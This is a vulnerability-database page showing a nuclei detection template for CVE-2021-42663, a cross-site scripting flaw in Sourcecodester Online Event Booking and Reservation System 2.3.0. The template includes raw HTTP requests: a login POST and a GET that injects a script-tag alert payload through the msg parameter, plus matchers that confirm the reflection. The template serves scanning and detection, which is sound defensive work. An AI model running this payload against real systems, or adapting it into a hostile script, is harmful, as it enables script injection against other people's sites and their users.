Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sourcecodester Online Event Booking and Reservation System 2.3.0 - Cross-Site Scripting

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 22 Views

Sourcecodester Online Event Booking and Reservation System 2.3.0 - Cross-Site Scripting vulnerability via msg paramete

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for Cross-site Scripting in Online_Event_Booking_And_Reservation_System_Project Online_Event_Booking_And_Reservation_System
3 Nov 202118:49
githubexploit
GithubExploit		Exploit for Cross-site Scripting in Online_Event_Booking_And_Reservation_System_Project Online_Event_Booking_And_Reservation_System
3 Nov 202118:49
githubexploit
BDU FSTEC		The vulnerability of the online event booking and reservation system, which exists due to the failure to take measures to eliminate special elements that allow a violator to disclose protected information.
17 Dec 202100:00
bdu_fstec
Circl		CVE-2021-42663
5 Nov 202110:55
circl
CNNVD		Engineers Online Portal 跨站脚本漏洞
5 Nov 202100:00
cnnvd
CNVD		Sourcecodester Online Event Booking and Reservation System HTML Injection Vulnerability
8 Nov 202100:00
cnvd
CVE		CVE-2021-42663
5 Nov 202112:17
cve
Cvelist		CVE-2021-42663
5 Nov 202112:17
cvelist
NVD		CVE-2021-42663
5 Nov 202113:15
nvd
OSV		CVE-2021-42663
5 Nov 202113:15
osv
Rows per page
id: CVE-2021-42663

info:
  name: Sourcecodester Online Event Booking and Reservation System 2.3.0 - Cross-Site Scripting
  author: fxploit
  severity: medium
  description: |
    Sourcecodester Online Event Booking and Reservation System 2.3.0 contains a cross-site scripting vulnerability in PHP/MySQL via the msg parameter to /event-management/index.php. An attacker can leverage this vulnerability in order to change the visibility of the website. Once the target user clicks on a given link, the content of the HTML code of the attacker's choice displays.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.
  remediation: |
    To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
  reference:
    - https://github.com/0xDeku/CVE-2021-42663
    - https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html
    - https://github.com/TheHackingRabbi/CVE-2021-42663
    - https://nvd.nist.gov/vuln/detail/CVE-2021-42663
    - https://github.com/SYRTI/POC_to_review
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2021-42663
    cwe-id: CWE-79
    epss-score: 0.03792
    epss-percentile: 0.88558
    cpe: cpe:2.3:a:online_event_booking_and_reservation_system_project:online_event_booking_and_reservation_system:2.3.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: online_event_booking_and_reservation_system_project
    product: online_event_booking_and_reservation_system
  tags: cve2021,cve,xss,online_event_booking_and_reservation_system_project,vuln

http:
  - raw:
      - |
        POST /login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        name={{username}}&pwd={{password}}
      - |
        GET /views/index.php?msg=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</i><script>alert(document.domain)</script></div>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402201e1aadca39e309b86886c7ae23cf9c6a931075b70bc85ad23d2dbce4792bb8ac02202447426a3717cc12111cfe6826ca7acb622ee89b83ca80a1caf3f41d1dff113f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
4.9Medium risk
Vulners AI Score4.9
CVSS 3.14.3
CVSS 24.3
EPSS0.03792
cve2021cross-site scriptingonline event booking and reservation system project
22